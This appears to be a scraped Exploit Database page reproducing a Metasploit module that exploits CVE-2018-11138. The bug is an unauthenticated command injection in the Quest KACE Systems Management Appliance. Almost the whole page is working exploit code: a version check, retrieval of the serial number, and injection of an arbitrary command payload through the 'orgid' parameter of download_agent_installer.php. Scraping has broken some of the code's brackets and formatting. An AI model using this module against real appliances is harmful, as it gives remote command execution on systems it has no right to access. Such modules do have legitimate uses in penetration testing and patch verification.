Quest KACE Systems Management – Command Injection (Metasploit)

Exploit Database
122 阅读

作者： Metasploit

日期： 2018-06-27
类别：
- remote
平台：
- unix
来源：https://www.exploit-db.com/exploits/44950/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::FileDropper

def initialize(info = {})

super(update_info(info,

'Name' => 'Quest KACE Systems Management Command Injection',

'Description'=> %q{

This module exploits a command injection vulnerability in Quest KACE

Systems Management Appliance version 8.0.318 (and possibly prior).

The <code>download_agent_installer.php</code> file allows unauthenticated users

to execute arbitrary commands as the web server user <code>www</code>.

A valid Organization ID is required. The default value is <code>1</code>.

A valid Windows agent version number must also be provided. If file

sharing is enabled, the agent versions are available within the

\\kace.local\client\agent_provisioning\windows_platform</code> Samba share.

Additionally, various agent versions are listed on the KACE website.

This module has been tested successfully on Quest KACE Systems

Management Appliance K1000 version 8.0 (Build 8.0.318).

'License'=> MSF_LICENSE,

'Privileged' => false,

'Platform' => 'unix', # FreeBSD

'Arch' => ARCH_CMD,

'DisclosureDate' => 'May 31 2018',

'Author' =>

[

'Leandro Barragan', # Discovery and PoC

'Guido Leo',# Discovery and PoC

'Brendan Coles',# Metasploit

'References' =>

[

['CVE', '2018-11138'],

['URL', 'https://support.quest.com/product-notification/noti-00000134'],

['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities']

'Payload'=>

{

'Space' => 1024,

'BadChars'=> "\x00\x27",

'DisableNops' => true,

'Compat'=>

{

'PayloadType' => 'cmd',

'RequiredCmd' => 'generic perl'

}

'Targets'=> [['Automatic', {}]],

'DefaultTarget'=> 0))

register_options [

OptString.new('SERIAL',[false, 'Serial number', '']),

OptString.new('ORGANIZATION',[true, 'Organization ID', '1']),

OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152'])

]

end

def check

res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php'))

unless res

vprint_error 'Connection failed'

return CheckCode::Unknown

end

unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance')

vprint_status 'Remote host is not a Quest KACE appliance'

return CheckCode::Safe

end

unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/

vprint_error 'Could not determine KACE appliance version'

return CheckCode::Detected

end

version = Gem::Version.new res.headers['X-KACE-Version'].to_s

vprint_status "Found KACE appliance version #{version}"

# Patched versions : https://support.quest.com/product-notification/noti-00000134

if version < Gem::Version.new('7.0') ||

(version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) ||

(version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) ||

(version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) ||

(version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) ||

(version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108'))

return CheckCode::Appears

end

CheckCode::Safe

end

def serial_number

return datastore['SERIAL'] unless datastore['SERIAL'].to_s.eql? ''

res = send_request_cgi('uri' => normalize_uri('common', 'about.php'))

return unless res

res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first

end

def exploit

check_code = check

unless [CheckCode::Appears, CheckCode::Detected].include? check_code

fail_with Failure::NotVulnerable, 'Target is not vulnerable'

end

serial = serial_number

if serial.to_s.eql? ''

print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.'

return

end

vprint_status "Using serial number: #{serial}"

print_status "Sending payload (#{payload.encoded.length} bytes)"

vars_get = Hash[{

'platform' => 'windows',

'serv' => Digest::SHA256.hexdigest(serial),

'orgid'=> "#{datastore['ORGANIZATION']}#; #{payload.encoded} ",

'version'=> datastore['AGENT_VERSION']

}.to_a.shuffle]

res = send_request_cgi({

'uri'=> normalize_uri('common', 'download_agent_installer.php'),

'vars_get' => vars_get

}, 10)

unless res

fail_with Failure::Unreachable, 'Connection failed'

end

unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX')

fail_with Failure::UnexpectedReply, 'Unexpected reply'

end

case res.code

when 200

print_good 'Payload executed successfully'

when 404

fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION'

when 302

if res.headers['location'].include? 'error.php'

fail_with Failure::UnexpectedReply, 'Server encountered an error'

end

fail_with Failure::BadConfig, 'The specified SERIAL is incorrect'

else

print_error 'Unexpected reply'

end

register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/"

end